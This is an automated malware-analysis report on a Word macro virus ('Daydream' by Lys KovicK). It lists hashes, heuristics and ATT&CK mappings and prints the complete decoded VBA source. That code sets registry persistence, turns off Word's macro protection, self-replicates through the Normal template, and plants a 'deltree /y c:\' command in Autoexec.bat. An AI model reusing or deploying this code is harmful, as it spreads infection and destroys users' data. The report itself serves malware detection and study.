Office (OLE) malware analysis — malicious · 419985b9595f4931

MALICIOUS

Office (OLE)

41.0 KB Created: 1999-05-27 19:11:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: a55342c51378427fb3b1152d0ab17c54 SHA-1: ee406c0168ec6b62040a7aeeb27223388c219cf6 SHA-256: 419985b9595f4931077bdb1949e1e4a6bb6d367543dab6c8caa35f3c2d224f96

316 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains VBA macros that execute upon document close (AutoClose) and document open (Document_Open). The AutoClose macro writes to the registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run with the value C:\WINDOWS\SYSTEM\Daydream.vbs, establishing persistence. It also exports a macro to C:\WINDOWS\SYSTEM\Daydream.dll. The script then creates a new VBScript file at C:\WINDOWS\SYSTEM\Daydream.vbs which appears to manipulate Word's macro security and attempts to add a file named Daydream.sys to the NormalTemplate.

Heuristics 8

Raw OLE macro text shows self-replication or security tampering critical OLE_RAW_MACRO_SELF_REPLICATION

OLE streams contain macro source text with auto-run entry points, CreateObject automation, CodeModule AddFromString/InsertLines/DeleteLines behavior, and Outlook or macro-security tampering. This is high-confidence macro-virus behavior even when oletools does not recover a standard VBA project.
ClamAV: Doc.Trojan.Lys-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Lys-1
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

Open "C:\WINDOWS\SYSTEM\Daydream.vbs" For Output As #1
Print #1, "Set Daydream = WScript.CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
Print #1, "Daydream.Options.VirusProtection = (0 - 0):Daydream.Options.SaveNormalPrompt = (1 - 1):Daydream.Options.ConfirmConversions = (2 - 2)"

Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro

Matched line in script

Open "C:\WINDOWS\SYSTEM\Daydream.sys" For Output As #1
Print #1, "Private Sub Document_Open()"
Print #1, "With ActiveDocument.VBProject.VBComponents.Item(1).CodeModule"

Auto_Close macro low OLE_VBA_AUTOCLOSE

Auto_Close macro

Matched line in script

Attribute VB_Customizable = True
Sub AutoClose()
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "") = "C:\WINDOWS\SYSTEM\Daydream.vbs"

Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3550 bytes
SHA-256: `35376664ac8af37ab0f91ac80494de3083f69d6cec98945d42e482aa49b05ba6`
Detection ClamAV: Doc.Trojan.Lys-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoClose() System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "") = "C:\WINDOWS\SYSTEM\Daydream.vbs" ActiveDocument.VBProject.VBComponents.Item(1).Export ("C:\WINDOWS\SYSTEM\Daydream.dll") Open "C:\WINDOWS\SYSTEM\Daydream.vbs" For Output As #1 Print #1, "Set Daydream = WScript.CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")" Print #1, "Daydream.Options.VirusProtection = (0 - 0):Daydream.Options.SaveNormalPrompt = (1 - 1):Daydream.Options.ConfirmConversions = (2 - 2)" Print #1, "Daydream.CommandBars(" & Chr(34) & "Tools" & Chr(34) & ").Controls(" & Chr(34) & "Macro" & Chr(34) & ").Visible = (3 - 3)" Print #1, "For x = 1 To Daydream.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines" Print #1, "Daydream.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1" Print #1, "Next" Print #1, "Daydream.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromFile (" & Chr(34) & "C:\WINDOWS\SYSTEM\Daydream.sys" & Chr(34) & ")" Print #1, "Daydream.Application.Quit" Close #1 Open "C:\WINDOWS\SYSTEM\Daydream.sys" For Output As #1 Print #1, "Private Sub Document_Open()" Print #1, "With ActiveDocument.VBProject.VBComponents.Item(1).CodeModule" Print #1, "For x = 1 to ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines" Print #1, ".DeleteLines 1" Print #1, "Next" Print #1, "End With" Print #1, "ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromFile (" & Chr(34) & "C:\WINDOWS\SYSTEM\Daydream.dll" & Chr(34) & ")" Print #1, "For x = 1 To ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines" Print #1, "If ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Find(" & Chr(34) & "Private Sub Document_Close()" & Chr(34) & ", 1, 1, 1, 30, True, True, True) = False Then ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1" Print #1, "Next" Print #1, "End Sub" Close #1 System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Subsystem") = "C:\WINDOWS\SYSTEM\32bitemu.vbs" Open "C:\WINDOWS\SYSTEM\32bitemu.vbs" For Output As #1 Print #1, "Set A = CreateObject(" & Chr(34) & "Scripting.FileSystemObject" & Chr(34) & ")" Print #1, "If (A.FileExists(" & Chr(34) & "C:\WINDOWS\SYSTEM\Daydream.vbs" & Chr(34) & ")) = False Then" Print #1, "Set B = A.CreateTextFile(" & Chr(34) & "C:\Autoexec.bat" & Chr(34) & ", True)" Print #1, "B.WriteLine (" & Chr(34) & "@deltree /y c:\ > NUL" & Chr(34) & ")" Print #1, "B.Close" Print #1, "End If" Close #1 If Day(15) Then SetAttr "C:\Msdos.sys", vbNormal System.PrivateProfileString("C:\Msdos.sys", "Options", "BootGUI") = "0" SetAttr "C:\Msdos.sys", vbSystem + vbHidden + vbReadOnly End If If ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Find("Sub AutoClose()", 1, 1, 1, 15, True, True, True) = True Then ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine 1, "Private Sub Document_Close()" Else: ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine 1, "Sub AutoClose()" End If ActiveDocument.SaveAs FileName:=ActiveDocument.FullName End Sub '.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,. ' Daydream(Fantasy) By Lys KovicK ';';';';';';';';';';';';';';';';';

Open this report in the interactive analyzer, or submit your own file for analysis.